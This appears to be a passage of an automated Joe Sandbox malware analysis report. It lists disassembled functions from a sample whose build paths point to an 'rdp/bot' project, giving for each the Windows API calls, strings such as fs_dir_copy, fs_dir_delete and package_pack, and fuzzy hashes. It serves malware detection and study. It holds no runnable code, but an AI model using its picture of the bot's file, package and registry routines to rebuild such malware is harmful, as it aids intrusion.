Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b65c7fc0dbd9a7b0299e0c2b8e0232ef07709154f27581d121896d02f68235f8
Instruction ID: 4919d6799bf9276306e7dff8f4bad38bdcd5d0c632e67abf5f15bd6ce57f4830
Opcode Fuzzy Hash: b65c7fc0dbd9a7b0299e0c2b8e0232ef07709154f27581d121896d02f68235f8
Instruction Fuzzy Hash: E1F06223A08A4641EB52DF91BC403BB625CAF407B5F880275DD5D466E0EF2DFA8A9300

Function 00007FFE11EC36B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11EC364D

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC369D
registry_get_value, xrefs: 00007FFE11EC3696

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 3cc0958dc823a3f95ba49ee48407de72d55fdcc69baeec2a75528ed6b1a49501
Instruction ID: 6fe03270a9d6831e09ee4b2c12cf2ee0ca3beed67f7bb5634ac7178aecf75b00
Opcode Fuzzy Hash: 3cc0958dc823a3f95ba49ee48407de72d55fdcc69baeec2a75528ed6b1a49501
Instruction Fuzzy Hash: 2CF06223A08A4641EB52DF91BC403BB625CAF407B4F880275DD5D466E0EF2DFA8A9300

Function 00007FFE11BDA31A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE11BDA3FB
Sleep.KERNEL32 ref: 00007FFE11BDA407

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
Instruction ID: 69d349ec2354feecd37689dda6babd7a83ac35163cdaf8cdb01f2b1b81e62e9d
Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
Instruction Fuzzy Hash: 0F318121E0DE03C2FB389F3BA884AB826596F45378F1023F1E47E466F6DE6CA5455641

Function 00007FFE1A4F26DA Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE1A4F27BB
Sleep.KERNEL32 ref: 00007FFE1A4F27C7

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
Instruction ID: bf52267081cd66e1804df2d4a27fe0542c71075cb41a6a705bdbc840b45159ab
Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
Instruction Fuzzy Hash: EA313C60F0CF4282F720576BA9942B92290AF42F31F2463F3D4BD466F5CE3CA5659A41

Function 00007FFE1A52605A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE1A52613B
Sleep.KERNEL32 ref: 00007FFE1A526147

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: b67d90b2c3accd995777715e01952dbc7cf2395bdc8511a2816b0710a16cbd58
Instruction ID: 81059c9d3f4eff34fcefa0abe8db836d3ff545e556542b15e1a2b3f9d44d1007
Opcode Fuzzy Hash: b67d90b2c3accd995777715e01952dbc7cf2395bdc8511a2816b0710a16cbd58
Instruction Fuzzy Hash: 75310825F0CE02D2F6209BA6E8842792252AF82F70F2007F7D47D46BF2DE2DB545A651

Function 00007FFE1150135A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE1150143B
Sleep.KERNEL32 ref: 00007FFE11501447

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
Instruction ID: 4edbf8d922d78bcf2900c0422808e4de4d64ef2d5f6cff6bf1c539c86d85f0bc
Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
Instruction Fuzzy Hash: FE311C20E0CE0282F7709BA7E8D527C339AAF40374F1003B9D47D46AF2DE2CEA459642

Function 00007FFE11EC135A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE11EC143B
Sleep.KERNEL32 ref: 00007FFE11EC1447

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
Instruction ID: 1c72abc43b6e9cc18b6fb2a41d3e5d935696c32c6dff2f1f8d110b64a96afa5b
Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
Instruction Fuzzy Hash: 4E31E920A0CE03C2FB319BAAAC8537B225AAF44774F9017B5D47D866F5DE2CF945A640

Function 00007FF7C1AB19E2 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C1AB1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB1FEE

SleepEx.KERNEL32 ref: 00007FF7C1AB1A51

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: HandleModuleSleep
String ID:
API String ID: 1071907932-0
Opcode ID: 6c356b81076ccd229cca5aeae758b78700b84b5aa9c7c0a5a2da4613d1651c2a
Instruction ID: 8225a8da091b60065633cb906fb054d4471ecc74c15a1f682232c564730fa789
Opcode Fuzzy Hash: 6c356b81076ccd229cca5aeae758b78700b84b5aa9c7c0a5a2da4613d1651c2a
Instruction Fuzzy Hash: 8001D63271C28782F390AE64F450BBDA1919B84364FD41036EE4E472C5EEECE845C360

Function 00007FF7C1AB1360 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetServiceStatus.SECHOST ref: 00007FF7C1AB1385

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
Instruction ID: 99a10efd225ecd56c1d63796206cbf09ba00c265f5c00553fc3c51854b737741
Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
Instruction Fuzzy Hash: 96D01774D1964685E704FF19E850828A260BF4D3B1FC48077C80E03330EEAC6124C720

Function 00007FF7C1AB862A Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

rand_s.MSVCRT ref: 00007FF7C1AB863B

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: rand_s
String ID:
API String ID: 863162693-0
Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
Instruction ID: c494446af0a62c624a6c427ffc61fb8d0d9185bb6bf5048c8a5314c638446b8d
Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
Instruction Fuzzy Hash: 0FC00236A185408AD720EB24E845659A770E798318FD04161EA5D82664DA7CD61ACF14

Function 00007FFE11508F37 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11508F45

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
Instruction ID: f213ff5a168ecc0fd63ad98f912bcbff8e50349f07615b42dd577c969936c9df
Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
Instruction Fuzzy Hash: B3C08C92F1AD02C3EB286BA3B885038022AAF9C320F0010B8D88E823729E5C68D84600

Non-executed Functions

Function 00007FF7C1AB5DAF Relevance: 49.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00007FF7C1AB5E0A
strlen.MSVCRT ref: 00007FF7C1AB5E12
strlen.MSVCRT ref: 00007FF7C1AB5E33
strlen.MSVCRT ref: 00007FF7C1AB5E45
strcmp.MSVCRT ref: 00007FF7C1AB5EED
strcmp.MSVCRT ref: 00007FF7C1AB5F05
_mbscat.MSVCRT ref: 00007FF7C1AB5F65
strlen.MSVCRT ref: 00007FF7C1AB5F6D
_mbscpy.MSVCRT ref: 00007FF7C1AB6053
strlen.MSVCRT ref: 00007FF7C1AB605B
strlen.MSVCRT ref: 00007FF7C1AB607D
_mbscat.MSVCRT ref: 00007FF7C1AB6096
_mbscpy.MSVCRT ref: 00007FF7C1AB60A9
strlen.MSVCRT ref: 00007FF7C1AB60B1
strlen.MSVCRT ref: 00007FF7C1AB60D3
_mbscat.MSVCRT ref: 00007FF7C1AB60EF

Strings

NULL, xrefs: 00007FF7C1AB62BD, 00007FF7C1AB62C6
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FF7C1AB5F9D
fs_dir_copy, xrefs: 00007FF7C1AB5F96, 00007FF7C1AB5FC4, 00007FF7C1AB5FEF, 00007FF7C1AB6102, 00007FF7C1AB6259, 00007FF7C1AB62D5
|, xrefs: 00007FF7C1AB5F72
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB5FCB, 00007FF7C1AB5FF6
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FF7C1AB6109
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FF7C1AB6260
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB5FB6, 00007FF7C1AB5FE1
*, xrefs: 00007FF7C1AB5E4A
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FF7C1AB62DC
(src != NULL), xrefs: 00007FF7C1AB5FBD
(dst != NULL), xrefs: 00007FF7C1AB5FE8

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$_mbscat_mbscpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 4213218670-3699962909
Opcode ID: a44bc367bfc9f906b4ea4f9570cd1b6a8ccdf32c3452e6cad442d2c014f808d4
Instruction ID: ab167ef3561e38e088fa4ce96cf6141bb0320a2924f4d5ccb6a2064b38477d01
Opcode Fuzzy Hash: a44bc367bfc9f906b4ea4f9570cd1b6a8ccdf32c3452e6cad442d2c014f808d4
Instruction Fuzzy Hash: 5EC16B71A0C2C281FB20EE11A550BBEE751AB453A4FC44033DE4D5769ADFBDE50ACB21

Function 00007FF7C1AB7AB6 Relevance: 45.8, APIs: 12, Strings: 14, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB7AE7
strlen.MSVCRT ref: 00007FF7C1AB7C47
strlen.MSVCRT ref: 00007FF7C1AB7C7E
GetProcessHeap.KERNEL32 ref: 00007FF7C1AB7D0F
HeapFree.KERNEL32 ref: 00007FF7C1AB7D20
GetProcessHeap.KERNEL32 ref: 00007FF7C1AB7D49
HeapAlloc.KERNEL32 ref: 00007FF7C1AB7D5A
memcpy.MSVCRT ref: 00007FF7C1AB7D9E
strcmp.MSVCRT ref: 00007FF7C1AB7DC7
GetProcessHeap.KERNEL32 ref: 00007FF7C1AB7DE4
HeapAlloc.KERNEL32 ref: 00007FF7C1AB7DF5
_mbscpy.MSVCRT ref: 00007FF7C1AB7E6E

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB7BCB, 00007FF7C1AB7BFB, 00007FF7C1AB7C2E
mem_alloc, xrefs: 00007FF7C1AB7D73, 00007FF7C1AB7E11
%TEMP%, xrefs: 00007FF7C1AB7EB2
[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x), xrefs: 00007FF7C1AB7CD8
[E] (%s) -> Failed(package=%s,entry=%s,err=%08x), xrefs: 00007FF7C1AB7B8C
(strlen(entry) <= 0xff), xrefs: 00007FF7C1AB7C20
(entry != NULL), xrefs: 00007FF7C1AB7BED
C:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF7C1AB7BB6, 00007FF7C1AB7BE6, 00007FF7C1AB7C19
[I] (%s) -> Done(package=%s,entry=%s), xrefs: 00007FF7C1AB7F52
(package != NULL), xrefs: 00007FF7C1AB7BBD
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF7C1AB7D7A, 00007FF7C1AB7E18
NULL, xrefs: 00007FF7C1AB7F2D, 00007FF7C1AB7F39
[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x), xrefs: 00007FF7C1AB7B4E
package_pack, xrefs: 00007FF7C1AB7B47, 00007FF7C1AB7B85, 00007FF7C1AB7BC4, 00007FF7C1AB7BF4, 00007FF7C1AB7C27, 00007FF7C1AB7CD1, 00007FF7C1AB7F4B

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Heap$Processstrlen$Alloc$Free_mbscpymemcpystrcmp
String ID: %TEMP%$(entry != NULL)$(package != NULL)$(strlen(entry) <= 0xff)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed(package=%s,entry=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(package=%s,entry=%s)$mem_alloc$package_pack
API String ID: 3441874634-3100963427
Opcode ID: 4e2109d9b56151c8ce2a8565a238e19997036d1a1133067340cc8457ac036173
Instruction ID: 80bb041b7d42096087e6e9facd5d7870828449f409eda381654b36d518f9c11a
Opcode Fuzzy Hash: 4e2109d9b56151c8ce2a8565a238e19997036d1a1133067340cc8457ac036173
Instruction Fuzzy Hash: E5C16B72A0868782EB10EF55A410BBDA761BB847A4F845033DE4E47795EFFDE50AC720

Function 00007FF7C1AB5771 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB5796
RemoveDirectoryA.KERNEL32 ref: 00007FF7C1AB57AE
GetLastError.KERNEL32 ref: 00007FF7C1AB57B8

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

_mbscpy.MSVCRT ref: 00007FF7C1AB5882
strlen.MSVCRT ref: 00007FF7C1AB588A
strlen.MSVCRT ref: 00007FF7C1AB58A6
strlen.MSVCRT ref: 00007FF7C1AB58B7
_mbscpy.MSVCRT ref: 00007FF7C1AB58D1
strlen.MSVCRT ref: 00007FF7C1AB58D9
strlen.MSVCRT ref: 00007FF7C1AB58FB
strlen.MSVCRT ref: 00007FF7C1AB590F
strcmp.MSVCRT ref: 00007FF7C1AB5951
strcmp.MSVCRT ref: 00007FF7C1AB5964
RemoveDirectoryA.KERNEL32 ref: 00007FF7C1AB5A0D
GetLastError.KERNEL32 ref: 00007FF7C1AB5A1B

Strings

(path != NULL), xrefs: 00007FF7C1AB57F3
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF7C1AB5B08
NULL, xrefs: 00007FF7C1AB5B55
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FF7C1AB5984
*, xrefs: 00007FF7C1AB58BC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB5801
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB57EC
fs_dir_delete, xrefs: 00007FF7C1AB57CF, 00007FF7C1AB57FA, 00007FF7C1AB597D, 00007FF7C1AB5A32, 00007FF7C1AB5B01, 00007FF7C1AB5B64
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF7C1AB5B6B
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF7C1AB57D6, 00007FF7C1AB5A39

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemove_mbscpystrcmp$fflushfwrite
String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 1390976747-4087913290
Opcode ID: 6f577c2dc94f4c40b4d41022a78535c6ed9255f5b1189d7f6429ee422dae1bcd
Instruction ID: 4bee93af09ca2b0087f6bad2fd2d09f59d7824b57534a1456b894df805495c53
Opcode Fuzzy Hash: 6f577c2dc94f4c40b4d41022a78535c6ed9255f5b1189d7f6429ee422dae1bcd
Instruction Fuzzy Hash: 8DA18831A0C6C2C5FB20EF15A854BBEE791AB853A4FD44033C94E57685EEBDE805CB20

Function 00007FF7C1AB9A69 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7C1AB9AA3
RegSetValueExA.ADVAPI32 ref: 00007FF7C1AB9BCC
RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9CF5

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

P, xrefs: 00007FF7C1AB9C77
, xrefs: 00007FF7C1AB9C06
